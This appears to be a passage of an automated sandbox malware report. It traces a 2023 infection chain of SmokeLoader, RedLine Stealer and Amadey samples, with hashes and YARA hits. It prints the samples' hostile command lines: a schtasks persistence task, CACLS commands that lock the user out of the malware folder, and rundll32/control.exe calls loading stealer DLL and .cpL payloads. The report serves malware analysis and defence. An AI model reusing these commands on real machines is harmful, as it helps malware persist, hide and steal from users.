Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.480765543.00000000004D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.480765543.00000000004D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.480510597.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.480510597.00000000004B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\jfshvii, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 6F2B.exePID: 5796, Parent PID: 3324

General

Target ID:	5
Start time:	01:32:59
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\6F2B.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\6F2B.exe
Imagebase:	0x930000
File size:	399'360 bytes
MD5 hash:	C2525C86E7015D51FD9034964B41FAE7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000003.467119503.00000000050EB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: x5587928.exePID: 5700, Parent PID: 5796

General

Target ID:	6
Start time:	01:33:00
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe
Imagebase:	0xce0000
File size:	239'616 bytes
MD5 hash:	E0110D68A72C0533529AD08E05CBC2BC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: g6604988.exePID: 4744, Parent PID: 5700

General

Target ID:	7
Start time:	01:33:00
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe
Imagebase:	0x11a0000
File size:	228'864 bytes
MD5 hash:	AEA234064483F651010CF9D981F59FEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000007.00000002.473077590.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000007.00000000.468231833.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000007.00000000.468231833.00000000011A1000.00000020.00000001.01000000.00000009.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: D217.exePID: 4696, Parent PID: 3324

General

Target ID:	8
Start time:	01:33:00
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\D217.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\D217.exe
Imagebase:	0x1270000
File size:	399'360 bytes
MD5 hash:	DD48A8AB0415034524EFC0AB82A32106
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000003.469686347.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: y4910383.exePID: 5428, Parent PID: 4696

General

Target ID:	9
Start time:	01:33:01
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe
Imagebase:	0x820000
File size:	240'128 bytes
MD5 hash:	0B98CC363FAFDAAC610709394C959F05
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: 3448.exePID: 5412, Parent PID: 3324

General

Target ID:	10
Start time:	01:33:01
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\3448.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\3448.exe
Imagebase:	0x7ff7f2800000
File size:	165'888 bytes
MD5 hash:	691A54B032D616E5F9303557FFD49ADD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: k4215493.exePID: 6936, Parent PID: 5428

General

Target ID:	11
Start time:	01:33:01
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe
Imagebase:	0x1f0000
File size:	11'264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: pdates.exePID: 6940, Parent PID: 4744

General

Target ID:	12
Start time:	01:33:01
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe"
Imagebase:	0x1030000
File size:	228'864 bytes
MD5 hash:	AEA234064483F651010CF9D981F59FEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.908966509.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 0000000C.00000002.908966509.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.908312889.0000000000ABB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000000.471614340.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 0000000C.00000000.471614340.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 0000000C.00000002.908312889.0000000000A7A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: ohcompetitive.exePID: 2552, Parent PID: 5412

General

Target ID:	13
Start time:	01:33:02
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe
Imagebase:	0xdb0000
File size:	15'360 bytes
MD5 hash:	0D017F7F9508AE53DE2A266572B33B99
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.786519380.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.726837895.0000000003314000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.726837895.000000000325B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.754662860.0000000004101000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000D.00000002.726837895.0000000003300000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira

Show Windows behavior

Chronological Activities

Analysis Process: h1931339.exePID: 5116, Parent PID: 5700

General

Target ID:	14
Start time:	01:33:03
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe
Imagebase:	0xb90000
File size:	11'264 bytes
MD5 hash:	7E93BACBBC33E6652E147E7FE07572A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira

Show Windows behavior

Chronological Activities

Analysis Process: schtasks.exePID: 1308, Parent PID: 6940

General

Target ID:	15
Start time:	01:33:03
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe" /F
Imagebase:	0xfb0000
File size:	185'856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7072, Parent PID: 1308

General

Target ID:	16
Start time:	01:33:03
Start date:	27/07/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5600, Parent PID: 6940

General

Target ID:	17
Start time:	01:33:03
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "pdates.exe" /P "user:N"&&CACLS "pdates.exe" /P "user:R" /E&&echo Y\|CACLS "..\925e7e99c5" /P "user:N"&&CACLS "..\925e7e99c5" /P "user:R" /E&&Exit
Imagebase:	0x11d0000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5044, Parent PID: 5600

General

Target ID:	18
Start time:	01:33:03
Start date:	27/07/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7fcd70000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 2152, Parent PID: 5600

General

Target ID:	19
Start time:	01:33:04
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x11d0000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 4424, Parent PID: 5600

General

Target ID:	20
Start time:	01:33:04
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "pdates.exe" /P "user:N"
Imagebase:	0x12c0000
File size:	27'648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: pdates.exePID: 4976, Parent PID: 1084

General

Target ID:	21
Start time:	01:33:04
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Imagebase:	0x1030000
File size:	228'864 bytes
MD5 hash:	AEA234064483F651010CF9D981F59FEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000000.476404974.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000015.00000000.476404974.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000015.00000002.479942590.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000015.00000002.479942590.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: l2956268.exePID: 5184, Parent PID: 5428

General

Target ID:	22
Start time:	01:33:04
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe
Imagebase:	0xaf0000
File size:	228'864 bytes
MD5 hash:	AEA234064483F651010CF9D981F59FEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000002.482305514.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000016.00000002.482305514.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000016.00000000.476570672.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000016.00000000.476570672.0000000000AF1000.00000020.00000001.01000000.00000015.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 4204, Parent PID: 5600

General

Target ID:	23
Start time:	01:33:04
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "pdates.exe" /P "user:R" /E
Imagebase:	0x12c0000
File size:	27'648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 3204, Parent PID: 5600

General

Target ID:	24
Start time:	01:33:05
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Imagebase:	0x11d0000
File size:	232'960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 6888, Parent PID: 5600

General

Target ID:	25
Start time:	01:33:05
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\925e7e99c5" /P "user:N"
Imagebase:	0x12c0000
File size:	27'648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6784, Parent PID: 6940

General

Target ID:	26
Start time:	01:33:05
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
Imagebase:	0xb20000
File size:	61'952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001A.00000002.908661620.000000006E801000.00000020.00000001.01000000.00000018.sdmp, Author: Joe Security

Show Windows behavior

Chronological Activities

Analysis Process: cacls.exePID: 6556, Parent PID: 5600

General

Target ID:	27
Start time:	01:33:05
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\cacls.exe
Wow64 process (32bit):	true
Commandline:	CACLS "..\925e7e99c5" /P "user:R" /E
Imagebase:	0x12c0000
File size:	27'648 bytes
MD5 hash:	4CBB1C027DF71C53A8EE4C855FD35B25
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: j8994074.exePID: 6840, Parent PID: 5796

General

Target ID:	28
Start time:	01:33:06
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe
Imagebase:	0x7a0000
File size:	178'742 bytes
MD5 hash:	E12039830693787EDB24E96255488216
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000000.481478522.00000000007A2000.00000002.00000001.01000000.00000019.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000002.691450585.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001C.00000002.691450585.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: pdates.exePID: 6856, Parent PID: 5184

General

Target ID:	29
Start time:	01:33:06
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe"
Imagebase:	0x1030000
File size:	228'864 bytes
MD5 hash:	AEA234064483F651010CF9D981F59FEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000002.483252105.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 0000001D.00000002.483252105.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001D.00000000.481814915.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 0000001D.00000000.481814915.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: n7660022.exePID: 6980, Parent PID: 4696

General

Target ID:	30
Start time:	01:33:08
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe
Imagebase:	0x660000
File size:	178'739 bytes
MD5 hash:	A29812C26E88DF3CCEACCC0A46F42396
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000002.680833922.00000000029E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001E.00000002.680833922.0000000002951000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML

Show Windows behavior

Chronological Activities

Analysis Process: B29C.exePID: 5596, Parent PID: 3324

General

Target ID:	31
Start time:	01:33:10
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\B29C.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\B29C.exe
Imagebase:	0x8d0000
File size:	1'485'589 bytes
MD5 hash:	929515C08EFDD71249F12EF92966A0AD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: control.exePID: 7060, Parent PID: 5596

General

Target ID:	32
Start time:	01:33:12
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\control.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Imagebase:	0x1220000
File size:	114'688 bytes
MD5 hash:	40FBA3FBFD5E33E0DE1BA45472FDA66F
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 7028, Parent PID: 7060

General

Target ID:	33
Start time:	01:33:13
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Imagebase:	0xb20000
File size:	61'952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6564, Parent PID: 7028

General

Target ID:	34
Start time:	01:33:20
Start date:	27/07/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Imagebase:	0x7ff6e7660000
File size:	69'632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4904, Parent PID: 6564

General

Target ID:	35
Start time:	01:33:20
Start date:	27/07/2023
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Imagebase:	0xb20000
File size:	61'952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: pdates.exePID: 4548, Parent PID: 1084

General

Target ID:	37
Start time:	01:34:01
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Imagebase:	0x1030000
File size:	228'864 bytes
MD5 hash:	AEA234064483F651010CF9D981F59FEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000002.602481339.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000025.00000002.602481339.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000025.00000000.599605971.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: Joe Security Rule: Windows_Trojan_Amadey_7abb059b, Description: unknown, Source: 00000025.00000000.599605971.0000000001031000.00000020.00000001.01000000.00000010.sdmp, Author: unknown

Show Windows behavior

Chronological Activities

Analysis Process: ohcompetitive.exePID: 6552, Parent PID: 2552

General

Target ID:	39
Start time:	01:34:54
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe
Imagebase:	0xdc0000
File size:	15'360 bytes
MD5 hash:	0D017F7F9508AE53DE2A266572B33B99
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: pdates.exePID: 6696, Parent PID: 1084

General

Target ID:	40
Start time:	01:35:00
Start date:	27/07/2023
Path:	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Wow64 process (32bit):	true
